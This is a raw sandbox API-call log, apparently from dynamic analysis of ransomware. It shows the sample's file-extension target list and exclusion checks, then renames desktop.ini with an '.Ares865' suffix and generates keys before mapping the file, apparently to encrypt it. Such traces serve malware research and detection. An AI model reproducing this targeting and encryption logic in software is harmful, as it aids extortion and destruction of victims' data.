[0057.427] lstrcmpiW (lpString1="ini", lpString2="mdt") returned -1 [0057.427] lstrlenW (lpString="mfd") returned 3 [0057.427] lstrcmpiW (lpString1="ini", lpString2="mfd") returned -1 [0057.427] lstrlenW (lpString="mpd") returned 3 [0057.427] lstrcmpiW (lpString1="ini", lpString2="mpd") returned -1 [0057.427] lstrlenW (lpString="mrg") returned 3 [0057.427] lstrcmpiW (lpString1="ini", lpString2="mrg") returned -1 [0057.427] lstrlenW (lpString="mud") returned 3 [0057.427] lstrcmpiW (lpString1="ini", lpString2="mud") returned -1 [0057.427] lstrlenW (lpString="mwb") returned 3 [0057.427] lstrcmpiW (lpString1="ini", lpString2="mwb") returned -1 [0057.427] lstrlenW (lpString="myd") returned 3 [0057.427] lstrcmpiW (lpString1="ini", lpString2="myd") returned -1 [0057.427] lstrlenW (lpString="ndf") returned 3 [0057.427] lstrcmpiW (lpString1="ini", lpString2="ndf") returned -1 [0057.427] lstrlenW (lpString="nnt") returned 3 [0057.427] lstrcmpiW (lpString1="ini", lpString2="nnt") returned -1 [0057.427] lstrlenW (lpString="nrmlib") returned 6 [0057.427] lstrcmpiW (lpString1="op.ini", lpString2="nrmlib") returned 1 [0057.427] lstrlenW (lpString="ns2") returned 3 [0057.427] lstrcmpiW (lpString1="ini", lpString2="ns2") returned -1 [0057.427] lstrlenW (lpString="ns3") returned 3 [0057.427] lstrcmpiW (lpString1="ini", lpString2="ns3") returned -1 [0057.427] lstrlenW (lpString="ns4") returned 3 [0057.427] lstrcmpiW (lpString1="ini", lpString2="ns4") returned -1 [0057.427] lstrlenW (lpString="nsf") returned 3 [0057.427] lstrcmpiW (lpString1="ini", lpString2="nsf") returned -1 [0057.428] lstrlenW (lpString="nv") returned 2 [0057.428] lstrcmpiW (lpString1="ni", lpString2="nv") returned -1 [0057.428] lstrlenW (lpString="nv2") returned 3 [0057.428] lstrcmpiW (lpString1="ini", lpString2="nv2") returned -1 [0057.428] lstrlenW (lpString="nwdb") returned 4 [0057.428] lstrcmpiW (lpString1=".ini", lpString2="nwdb") returned -1 [0057.428] lstrlenW (lpString="nyf") returned 3 [0057.428] lstrcmpiW (lpString1="ini", lpString2="nyf") returned -1 [0057.428] lstrlenW (lpString="odb") returned 3 [0057.428] lstrcmpiW (lpString1="ini", lpString2="odb") returned -1 [0057.428] lstrlenW (lpString="odb") returned 3 [0057.428] lstrcmpiW (lpString1="ini", lpString2="odb") returned -1 [0057.428] lstrlenW (lpString="oqy") returned 3 [0057.428] lstrcmpiW (lpString1="ini", lpString2="oqy") returned -1 [0057.428] lstrlenW (lpString="ora") returned 3 [0057.428] lstrcmpiW (lpString1="ini", lpString2="ora") returned -1 [0057.428] lstrlenW (lpString="orx") returned 3 [0057.428] lstrcmpiW (lpString1="ini", lpString2="orx") returned -1 [0057.428] lstrlenW (lpString="owc") returned 3 [0057.428] lstrcmpiW (lpString1="ini", lpString2="owc") returned -1 [0057.428] lstrlenW (lpString="p96") returned 3 [0057.428] lstrcmpiW (lpString1="ini", lpString2="p96") returned -1 [0057.428] lstrlenW (lpString="p97") returned 3 [0057.428] lstrcmpiW (lpString1="ini", lpString2="p97") returned -1 [0057.428] lstrlenW (lpString="pan") returned 3 [0057.428] lstrcmpiW (lpString1="ini", lpString2="pan") returned -1 [0057.428] lstrlenW (lpString="pdb") returned 3 [0057.428] lstrcmpiW (lpString1="ini", lpString2="pdb") returned -1 [0057.428] lstrlenW (lpString="pdm") returned 3 [0057.428] lstrcmpiW (lpString1="ini", lpString2="pdm") returned -1 [0057.428] lstrlenW (lpString="pnz") returned 3 [0057.428] lstrcmpiW (lpString1="ini", lpString2="pnz") returned -1 [0057.428] lstrlenW (lpString="qry") returned 3 [0057.428] lstrcmpiW (lpString1="ini", lpString2="qry") returned -1 [0057.428] lstrlenW (lpString="qvd") returned 3 [0057.428] lstrcmpiW (lpString1="ini", lpString2="qvd") returned -1 [0057.428] lstrlenW (lpString="rbf") returned 3 [0057.428] lstrcmpiW (lpString1="ini", lpString2="rbf") returned -1 [0057.428] lstrlenW (lpString="rctd") returned 4 [0057.429] lstrcmpiW (lpString1=".ini", lpString2="rctd") returned -1 [0057.429] lstrlenW (lpString="rod") returned 3 [0057.429] lstrcmpiW (lpString1="ini", lpString2="rod") returned -1 [0057.429] lstrlenW (lpString="rodx") returned 4 [0057.429] lstrcmpiW (lpString1=".ini", lpString2="rodx") returned -1 [0057.429] lstrlenW (lpString="rpd") returned 3 [0057.429] lstrcmpiW (lpString1="ini", lpString2="rpd") returned -1 [0057.429] lstrlenW (lpString="rsd") returned 3 [0057.429] lstrcmpiW (lpString1="ini", lpString2="rsd") returned -1 [0057.429] lstrlenW (lpString="sas7bdat") returned 8 [0057.429] lstrcmpiW (lpString1="ktop.ini", lpString2="sas7bdat") returned -1 [0057.429] lstrlenW (lpString="sbf") returned 3 [0057.429] lstrcmpiW (lpString1="ini", lpString2="sbf") returned -1 [0057.429] lstrlenW (lpString="scx") returned 3 [0057.429] lstrcmpiW (lpString1="ini", lpString2="scx") returned -1 [0057.429] lstrlenW (lpString="sdb") returned 3 [0057.429] lstrcmpiW (lpString1="ini", lpString2="sdb") returned -1 [0057.429] lstrlenW (lpString="sdc") returned 3 [0057.429] lstrcmpiW (lpString1="ini", lpString2="sdc") returned -1 [0057.429] lstrlenW (lpString="sdf") returned 3 [0057.429] lstrcmpiW (lpString1="ini", lpString2="sdf") returned -1 [0057.429] lstrlenW (lpString="sis") returned 3 [0057.429] lstrcmpiW (lpString1="ini", lpString2="sis") returned -1 [0057.429] lstrlenW (lpString="spq") returned 3 [0057.429] lstrcmpiW (lpString1="ini", lpString2="spq") returned -1 [0057.429] lstrlenW (lpString="te") returned 2 [0057.429] lstrcmpiW (lpString1="ni", lpString2="te") returned -1 [0057.429] lstrlenW (lpString="teacher") returned 7 [0057.429] lstrcmpiW (lpString1="top.ini", lpString2="teacher") returned 1 [0057.429] lstrlenW (lpString="tmd") returned 3 [0057.429] lstrcmpiW (lpString1="ini", lpString2="tmd") returned -1 [0057.429] lstrlenW (lpString="tps") returned 3 [0057.429] lstrcmpiW (lpString1="ini", lpString2="tps") returned -1 [0057.429] lstrlenW (lpString="trc") returned 3 [0057.429] lstrcmpiW (lpString1="ini", lpString2="trc") returned -1 [0057.429] lstrlenW (lpString="trc") returned 3 [0057.429] lstrcmpiW (lpString1="ini", lpString2="trc") returned -1 [0057.429] lstrlenW (lpString="trm") returned 3 [0057.430] lstrcmpiW (lpString1="ini", lpString2="trm") returned -1 [0057.430] lstrlenW (lpString="udb") returned 3 [0057.430] lstrcmpiW (lpString1="ini", lpString2="udb") returned -1 [0057.430] lstrlenW (lpString="udl") returned 3 [0057.430] lstrcmpiW (lpString1="ini", lpString2="udl") returned -1 [0057.430] lstrlenW (lpString="usr") returned 3 [0057.430] lstrcmpiW (lpString1="ini", lpString2="usr") returned -1 [0057.430] lstrlenW (lpString="v12") returned 3 [0057.430] lstrcmpiW (lpString1="ini", lpString2="v12") returned -1 [0057.430] lstrlenW (lpString="vis") returned 3 [0057.430] lstrcmpiW (lpString1="ini", lpString2="vis") returned -1 [0057.430] lstrlenW (lpString="vpd") returned 3 [0057.430] lstrcmpiW (lpString1="ini", lpString2="vpd") returned -1 [0057.430] lstrlenW (lpString="vvv") returned 3 [0057.430] lstrcmpiW (lpString1="ini", lpString2="vvv") returned -1 [0057.430] lstrlenW (lpString="wdb") returned 3 [0057.430] lstrcmpiW (lpString1="ini", lpString2="wdb") returned -1 [0057.430] lstrlenW (lpString="wmdb") returned 4 [0057.430] lstrcmpiW (lpString1=".ini", lpString2="wmdb") returned -1 [0057.430] lstrlenW (lpString="wrk") returned 3 [0057.430] lstrcmpiW (lpString1="ini", lpString2="wrk") returned -1 [0057.430] lstrlenW (lpString="xdb") returned 3 [0057.430] lstrcmpiW (lpString1="ini", lpString2="xdb") returned -1 [0057.430] lstrlenW (lpString="xld") returned 3 [0057.430] lstrcmpiW (lpString1="ini", lpString2="xld") returned -1 [0057.430] lstrlenW (lpString="xmlff") returned 5 [0057.430] lstrcmpiW (lpString1="p.ini", lpString2="xmlff") returned -1 [0057.430] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Public\\Desktop\\desktop.ini.Ares865") returned 43 [0057.430] MoveFileExW (lpExistingFileName="C:\\Users\\Public\\Desktop\\desktop.ini" (normalized: "c:\\users\\public\\desktop\\desktop.ini"), lpNewFileName="C:\\Users\\Public\\Desktop\\desktop.ini.Ares865" (normalized: "c:\\users\\public\\desktop\\desktop.ini.ares865"), dwFlags=0x1) returned 1 [0057.431] CreateFileW (lpFileName="C:\\Users\\Public\\Desktop\\desktop.ini.Ares865" (normalized: "c:\\users\\public\\desktop\\desktop.ini.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0057.431] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=174) returned 1 [0057.431] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0057.431] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0057.431] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0057.431] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2effc8) returned 1 [0057.432] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0057.432] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0057.432] CreateFileMappingW (hFile=0x15c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x3b0, lpName=0x0) returned 0x164 [0057.445] MapViewOfFile (hFileMappingObject=0x164, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3b0) returned 0x190000 [0057.445] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0057.446] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0057.446] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0057.447] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2fe0 [0057.447] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2fe0 | out: hHeap=0x2b0000) returned 1 [0057.447] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0057.447] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0057.447] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0057.447] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0057.447] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d5ee0 [0057.447] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0057.447] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d5ee0 | out: hHeap=0x2b0000) returned 1 [0057.447] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0057.447] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0057.447] CloseHandle (hObject=0x164) returned 1 [0057.447] CloseHandle (hObject=0x15c) returned 1 [0057.449] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0057.449] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0518 | out: hHeap=0x2b0000) returned 1 [0057.449] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0057.451] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7df21ca0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7df21ca0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x7df21ca0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x8d1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Google Chrome.lnk", cAlternateFileName="GOOGLE~1.LNK")) returned 1 [0057.451] lstrcmpiW (lpString1="Google Chrome.lnk", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0057.451] lstrcmpiW (lpString1="Google Chrome.lnk", lpString2="aoldtz.exe") returned 1 [0057.451] lstrcmpiW (lpString1="Google Chrome.lnk", lpString2=".") returned 1 [0057.451] lstrcmpiW (lpString1="Google Chrome.lnk", lpString2="..") returned 1 [0057.451] lstrcmpiW (lpString1="Google Chrome.lnk", lpString2="windows") returned -1 [0057.451] lstrcmpiW (lpString1="Google Chrome.lnk", lpString2="bootmgr") returned 1 [0057.451] lstrcmpiW (lpString1="Google Chrome.lnk", lpString2="temp") returned -1 [0057.451] lstrcmpiW (lpString1="Google Chrome.lnk", lpString2="pagefile.sys") returned -1 [0057.451] lstrcmpiW (lpString1="Google Chrome.lnk", lpString2="boot") returned 1 [0057.452] lstrcmpiW (lpString1="Google Chrome.lnk", lpString2="ids.txt") returned -1 [0057.452] lstrcmpiW (lpString1="Google Chrome.lnk", lpString2="ntuser.dat") returned -1 [0057.452] lstrcmpiW (lpString1="Google Chrome.lnk", lpString2="perflogs") returned -1 [0057.452] lstrcmpiW (lpString1="Google Chrome.lnk", lpString2="MSBuild") returned -1 [0057.452] lstrlenW (lpString="Google Chrome.lnk") returned 17 [0057.452] lstrlenW (lpString="C:\\Users\\Public\\Desktop\\desktop.ini") returned 35 [0057.452] lstrcpyW (in: lpString1=0x2cce430, lpString2="Google Chrome.lnk" | out: lpString1="Google Chrome.lnk") returned="Google Chrome.lnk" [0057.452] lstrlenW (lpString="Google Chrome.lnk") returned 17 [0057.452] lstrlenW (lpString="Ares865") returned 7 [0057.452] lstrcmpiW (lpString1="ome.lnk", lpString2="Ares865") returned 1 [0057.452] lstrlenW (lpString=".dll") returned 4 [0057.452] lstrcmpiW (lpString1="Google Chrome.lnk", lpString2=".dll") returned 1 [0057.452] lstrlenW (lpString=".lnk") returned 4 [0057.452] lstrcmpiW (lpString1="Google Chrome.lnk", lpString2=".lnk") returned 1 [0057.452] lstrlenW (lpString=".ini") returned 4 [0057.452] lstrcmpiW (lpString1="Google Chrome.lnk", lpString2=".ini") returned 1 [0057.452] lstrlenW (lpString=".sys") returned 4 [0057.452] lstrcmpiW (lpString1="Google Chrome.lnk", lpString2=".sys") returned 1 [0057.452] lstrlenW (lpString="Google Chrome.lnk") returned 17 [0057.452] lstrlenW (lpString="bak") returned 3 [0057.452] lstrcmpiW (lpString1="lnk", lpString2="bak") returned 1 [0057.452] lstrlenW (lpString="ba_") returned 3 [0057.452] lstrcmpiW (lpString1="lnk", lpString2="ba_") returned 1 [0057.452] lstrlenW (lpString="dbb") returned 3 [0057.452] lstrcmpiW (lpString1="lnk", lpString2="dbb") returned 1 [0057.452] lstrlenW (lpString="vmdk") returned 4 [0057.452] lstrcmpiW (lpString1=".lnk", lpString2="vmdk") returned -1 [0057.452] lstrlenW (lpString="rar") returned 3 [0057.452] lstrcmpiW (lpString1="lnk", lpString2="rar") returned -1 [0057.452] lstrlenW (lpString="zip") returned 3 [0057.452] lstrcmpiW (lpString1="lnk", lpString2="zip") returned -1 [0057.452] lstrlenW (lpString="tgz") returned 3 [0057.452] lstrcmpiW (lpString1="lnk", lpString2="tgz") returned -1 [0057.452] lstrlenW (lpString="vbox") returned 4 [0057.452] lstrcmpiW (lpString1=".lnk", lpString2="vbox") returned -1 [0057.452] lstrlenW (lpString="vdi") returned 3 [0057.452] lstrcmpiW (lpString1="lnk", lpString2="vdi") returned -1 [0057.453] lstrlenW (lpString="vhd") returned 3 [0057.453] lstrcmpiW (lpString1="lnk", lpString2="vhd") returned -1 [0057.453] lstrlenW (lpString="vhdx") returned 4 [0057.453] lstrcmpiW (lpString1=".lnk", lpString2="vhdx") returned -1 [0057.453] lstrlenW (lpString="avhd") returned 4 [0057.453] lstrcmpiW (lpString1=".lnk", lpString2="avhd") returned -1 [0057.453] lstrlenW (lpString="db") returned 2 [0057.453] lstrcmpiW (lpString1="nk", lpString2="db") returned 1 [0057.453] lstrlenW (lpString="db2") returned 3 [0057.453] lstrcmpiW (lpString1="lnk", lpString2="db2") returned 1 [0057.453] lstrlenW (lpString="db3") returned 3 [0057.453] lstrcmpiW (lpString1="lnk", lpString2="db3") returned 1 [0057.453] lstrlenW (lpString="dbf") returned 3 [0057.453] lstrcmpiW (lpString1="lnk", lpString2="dbf") returned 1 [0057.453] lstrlenW (lpString="mdf") returned 3 [0057.453] lstrcmpiW (lpString1="lnk", lpString2="mdf") returned -1 [0057.453] lstrlenW (lpString="mdb") returned 3 [0057.453] lstrcmpiW (lpString1="lnk", lpString2="mdb") returned -1 [0057.453] lstrlenW (lpString="sql") returned 3 [0057.453] lstrcmpiW (lpString1="lnk", lpString2="sql") returned -1 [0057.453] lstrlenW (lpString="sqlite") returned 6 [0057.453] lstrcmpiW (lpString1="me.lnk", lpString2="sqlite") returned -1 [0057.453] lstrlenW (lpString="sqlite3") returned 7 [0057.453] lstrcmpiW (lpString1="ome.lnk", lpString2="sqlite3") returned -1 [0057.453] lstrlenW (lpString="sqlitedb") returned 8 [0057.453] lstrcmpiW (lpString1="rome.lnk", lpString2="sqlitedb") returned -1 [0057.453] lstrlenW (lpString="xml") returned 3 [0057.453] lstrcmpiW (lpString1="lnk", lpString2="xml") returned -1 [0057.453] lstrlenW (lpString="$er") returned 3 [0057.453] lstrcmpiW (lpString1="lnk", lpString2="$er") returned 1 [0057.453] lstrlenW (lpString="4dd") returned 3 [0057.453] lstrcmpiW (lpString1="lnk", lpString2="4dd") returned 1 [0057.453] lstrlenW (lpString="4dl") returned 3 [0057.453] lstrcmpiW (lpString1="lnk", lpString2="4dl") returned 1 [0057.453] lstrlenW (lpString="^^^") returned 3 [0057.453] lstrcmpiW (lpString1="lnk", lpString2="^^^") returned 1 [0057.453] lstrlenW (lpString="abs") returned 3 [0057.453] lstrcmpiW (lpString1="lnk", lpString2="abs") returned 1 [0057.454] lstrlenW (lpString="abx") returned 3 [0057.454] lstrcmpiW (lpString1="lnk", lpString2="abx") returned 1 [0057.454] lstrlenW (lpString="accdb") returned 5 [0057.454] lstrcmpiW (lpString1="e.lnk", lpString2="accdb") returned 1 [0057.454] lstrlenW (lpString="accdc") returned 5 [0057.454] lstrcmpiW (lpString1="e.lnk", lpString2="accdc") returned 1 [0057.454] lstrlenW (lpString="accde") returned 5 [0057.454] lstrcmpiW (lpString1="e.lnk", lpString2="accde") returned 1 [0057.454] lstrlenW (lpString="accdr") returned 5 [0057.454] lstrcmpiW (lpString1="e.lnk", lpString2="accdr") returned 1 [0057.454] lstrlenW (lpString="accdt") returned 5 [0057.454] lstrcmpiW (lpString1="e.lnk", lpString2="accdt") returned 1 [0057.454] lstrlenW (lpString="accdw") returned 5 [0057.454] lstrcmpiW (lpString1="e.lnk", lpString2="accdw") returned 1 [0057.454] lstrlenW (lpString="accft") returned 5 [0057.454] lstrcmpiW (lpString1="e.lnk", lpString2="accft") returned 1 [0057.454] lstrlenW (lpString="adb") returned 3 [0057.454] lstrcmpiW (lpString1="lnk", lpString2="adb") returned 1 [0057.454] lstrlenW (lpString="adb") returned 3 [0057.454] lstrcmpiW (lpString1="lnk", lpString2="adb") returned 1 [0057.454] lstrlenW (lpString="ade") returned 3 [0057.454] lstrcmpiW (lpString1="lnk", lpString2="ade") returned 1 [0057.454] lstrlenW (lpString="adf") returned 3 [0057.454] lstrcmpiW (lpString1="lnk", lpString2="adf") returned 1 [0057.454] lstrlenW (lpString="adn") returned 3 [0057.454] lstrcmpiW (lpString1="lnk", lpString2="adn") returned 1 [0057.454] lstrlenW (lpString="adp") returned 3 [0057.454] lstrcmpiW (lpString1="lnk", lpString2="adp") returned 1 [0057.454] lstrlenW (lpString="alf") returned 3 [0057.454] lstrcmpiW (lpString1="lnk", lpString2="alf") returned 1 [0057.454] lstrlenW (lpString="ask") returned 3 [0057.454] lstrcmpiW (lpString1="lnk", lpString2="ask") returned 1 [0057.454] lstrlenW (lpString="btr") returned 3 [0057.454] lstrcmpiW (lpString1="lnk", lpString2="btr") returned 1 [0057.454] lstrlenW (lpString="cat") returned 3 [0057.454] lstrcmpiW (lpString1="lnk", lpString2="cat") returned 1 [0057.455] lstrlenW (lpString="cdb") returned 3 [0057.455] lstrcmpiW (lpString1="lnk", lpString2="cdb") returned 1 [0057.455] lstrlenW (lpString="ckp") returned 3 [0057.455] lstrcmpiW (lpString1="lnk", lpString2="ckp") returned 1 [0057.455] lstrlenW (lpString="cma") returned 3 [0057.455] lstrcmpiW (lpString1="lnk", lpString2="cma") returned 1 [0057.455] lstrlenW (lpString="cpd") returned 3 [0057.455] lstrcmpiW (lpString1="lnk", lpString2="cpd") returned 1 [0057.455] lstrlenW (lpString="dacpac") returned 6 [0057.455] lstrcmpiW (lpString1="me.lnk", lpString2="dacpac") returned 1 [0057.455] lstrlenW (lpString="dad") returned 3 [0057.455] lstrcmpiW (lpString1="lnk", lpString2="dad") returned 1 [0057.455] lstrlenW (lpString="dadiagrams") returned 10 [0057.455] lstrcmpiW (lpString1="Chrome.lnk", lpString2="dadiagrams") returned -1 [0057.455] lstrlenW (lpString="daschema") returned 8 [0057.455] lstrcmpiW (lpString1="rome.lnk", lpString2="daschema") returned 1 [0057.455] lstrlenW (lpString="db-journal") returned 10 [0057.455] lstrcmpiW (lpString1="Chrome.lnk", lpString2="db-journal") returned -1 [0057.455] lstrlenW (lpString="db-shm") returned 6 [0057.455] lstrcmpiW (lpString1="me.lnk", lpString2="db-shm") returned 1 [0057.455] lstrlenW (lpString="db-wal") returned 6 [0057.455] lstrcmpiW (lpString1="me.lnk", lpString2="db-wal") returned 1 [0057.455] lstrlenW (lpString="dbc") returned 3 [0057.455] lstrcmpiW (lpString1="lnk", lpString2="dbc") returned 1 [0057.455] lstrlenW (lpString="dbs") returned 3 [0057.455] lstrcmpiW (lpString1="lnk", lpString2="dbs") returned 1 [0057.455] lstrlenW (lpString="dbt") returned 3 [0057.455] lstrcmpiW (lpString1="lnk", lpString2="dbt") returned 1 [0057.455] lstrlenW (lpString="dbv") returned 3 [0057.455] lstrcmpiW (lpString1="lnk", lpString2="dbv") returned 1 [0057.455] lstrlenW (lpString="dbx") returned 3 [0057.455] lstrcmpiW (lpString1="lnk", lpString2="dbx") returned 1 [0057.455] lstrlenW (lpString="dcb") returned 3 [0057.455] lstrcmpiW (lpString1="lnk", lpString2="dcb") returned 1 [0057.455] lstrlenW (lpString="dct") returned 3 [0057.455] lstrcmpiW (lpString1="lnk", lpString2="dct") returned 1 [0057.455] lstrlenW (lpString="dcx") returned 3 [0057.455] lstrcmpiW (lpString1="lnk", lpString2="dcx") returned 1 [0057.456] lstrlenW (lpString="ddl") returned 3 [0057.456] lstrcmpiW (lpString1="lnk", lpString2="ddl") returned 1 [0057.456] lstrlenW (lpString="dlis") returned 4 [0057.456] lstrcmpiW (lpString1=".lnk", lpString2="dlis") returned -1 [0057.456] lstrlenW (lpString="dp1") returned 3 [0057.456] lstrcmpiW (lpString1="lnk", lpString2="dp1") returned 1 [0057.456] lstrlenW (lpString="dqy") returned 3 [0057.456] lstrcmpiW (lpString1="lnk", lpString2="dqy") returned 1 [0057.456] lstrlenW (lpString="dsk") returned 3 [0057.456] lstrcmpiW (lpString1="lnk", lpString2="dsk") returned 1 [0057.456] lstrlenW (lpString="dsn") returned 3 [0057.456] lstrcmpiW (lpString1="lnk", lpString2="dsn") returned 1 [0057.456] lstrlenW (lpString="dtsx") returned 4 [0057.456] lstrcmpiW (lpString1=".lnk", lpString2="dtsx") returned -1 [0057.456] lstrlenW (lpString="dxl") returned 3 [0057.456] lstrcmpiW (lpString1="lnk", lpString2="dxl") returned 1 [0057.456] lstrlenW (lpString="eco") returned 3 [0057.456] lstrcmpiW (lpString1="lnk", lpString2="eco") returned 1 [0057.456] lstrlenW (lpString="ecx") returned 3 [0057.456] lstrcmpiW (lpString1="lnk", lpString2="ecx") returned 1 [0057.456] lstrlenW (lpString="edb") returned 3 [0057.456] lstrcmpiW (lpString1="lnk", lpString2="edb") returned 1 [0057.456] lstrlenW (lpString="epim") returned 4 [0057.456] lstrcmpiW (lpString1=".lnk", lpString2="epim") returned -1 [0057.456] lstrlenW (lpString="fcd") returned 3 [0057.456] lstrcmpiW (lpString1="lnk", lpString2="fcd") returned 1 [0057.456] lstrlenW (lpString="fdb") returned 3 [0057.456] lstrcmpiW (lpString1="lnk", lpString2="fdb") returned 1 [0057.456] lstrlenW (lpString="fic") returned 3 [0057.456] lstrcmpiW (lpString1="lnk", lpString2="fic") returned 1 [0057.456] lstrlenW (lpString="flexolibrary") returned 12 [0057.456] lstrcmpiW (lpString1="e Chrome.lnk", lpString2="flexolibrary") returned -1 [0057.456] lstrlenW (lpString="fm5") returned 3 [0057.456] lstrcmpiW (lpString1="lnk", lpString2="fm5") returned 1 [0057.456] lstrlenW (lpString="fmp") returned 3 [0057.456] lstrcmpiW (lpString1="lnk", lpString2="fmp") returned 1 [0057.456] lstrlenW (lpString="fmp12") returned 5 [0057.457] lstrcmpiW (lpString1="e.lnk", lpString2="fmp12") returned -1 [0057.457] lstrlenW (lpString="fmpsl") returned 5 [0057.457] lstrcmpiW (lpString1="e.lnk", lpString2="fmpsl") returned -1 [0057.457] lstrlenW (lpString="fol") returned 3 [0057.457] lstrcmpiW (lpString1="lnk", lpString2="fol") returned 1 [0057.457] lstrlenW (lpString="fp3") returned 3 [0057.457] lstrcmpiW (lpString1="lnk", lpString2="fp3") returned 1 [0057.457] lstrlenW (lpString="fp4") returned 3 [0057.457] lstrcmpiW (lpString1="lnk", lpString2="fp4") returned 1 [0057.457] lstrlenW (lpString="fp5") returned 3 [0057.457] lstrcmpiW (lpString1="lnk", lpString2="fp5") returned 1 [0057.457] lstrlenW (lpString="fp7") returned 3 [0057.457] lstrcmpiW (lpString1="lnk", lpString2="fp7") returned 1 [0057.457] lstrlenW (lpString="fpt") returned 3 [0057.457] lstrcmpiW (lpString1="lnk", lpString2="fpt") returned 1 [0057.457] lstrlenW (lpString="frm") returned 3 [0057.457] lstrcmpiW (lpString1="lnk", lpString2="frm") returned 1 [0057.457] lstrlenW (lpString="gdb") returned 3 [0057.457] lstrcmpiW (lpString1="lnk", lpString2="gdb") returned 1 [0057.457] lstrlenW (lpString="gdb") returned 3 [0057.457] lstrcmpiW (lpString1="lnk", lpString2="gdb") returned 1 [0057.457] lstrlenW (lpString="grdb") returned 4 [0057.457] lstrcmpiW (lpString1=".lnk", lpString2="grdb") returned -1 [0057.457] lstrlenW (lpString="gwi") returned 3 [0057.457] lstrcmpiW (lpString1="lnk", lpString2="gwi") returned 1 [0057.457] lstrlenW (lpString="hdb") returned 3 [0057.457] lstrcmpiW (lpString1="lnk", lpString2="hdb") returned 1 [0057.457] lstrlenW (lpString="his") returned 3 [0057.457] lstrcmpiW (lpString1="lnk", lpString2="his") returned 1 [0057.457] lstrlenW (lpString="ib") returned 2 [0057.457] lstrcmpiW (lpString1="nk", lpString2="ib") returned 1 [0057.457] lstrlenW (lpString="idb") returned 3 [0057.457] lstrcmpiW (lpString1="lnk", lpString2="idb") returned 1 [0057.457] lstrlenW (lpString="ihx") returned 3 [0057.457] lstrcmpiW (lpString1="lnk", lpString2="ihx") returned 1 [0057.457] lstrlenW (lpString="itdb") returned 4 [0057.457] lstrcmpiW (lpString1=".lnk", lpString2="itdb") returned -1 [0057.457] lstrlenW (lpString="itw") returned 3 [0057.458] lstrcmpiW (lpString1="lnk", lpString2="itw") returned 1 [0057.458] lstrlenW (lpString="jet") returned 3 [0057.458] lstrcmpiW (lpString1="lnk", lpString2="jet") returned 1 [0057.458] lstrlenW (lpString="jtx") returned 3 [0057.458] lstrcmpiW (lpString1="lnk", lpString2="jtx") returned 1 [0057.458] lstrlenW (lpString="kdb") returned 3 [0057.458] lstrcmpiW (lpString1="lnk", lpString2="kdb") returned 1 [0057.458] lstrlenW (lpString="kexi") returned 4 [0057.458] lstrcmpiW (lpString1=".lnk", lpString2="kexi") returned -1 [0057.458] lstrlenW (lpString="kexic") returned 5 [0057.458] lstrcmpiW (lpString1="e.lnk", lpString2="kexic") returned -1 [0057.458] lstrlenW (lpString="kexis") returned 5 [0057.458] lstrcmpiW (lpString1="e.lnk", lpString2="kexis") returned -1 [0057.458] lstrlenW (lpString="lgc") returned 3 [0057.458] lstrcmpiW (lpString1="lnk", lpString2="lgc") returned 1 [0057.458] lstrlenW (lpString="lwx") returned 3 [0057.458] lstrcmpiW (lpString1="lnk", lpString2="lwx") returned -1 [0057.458] 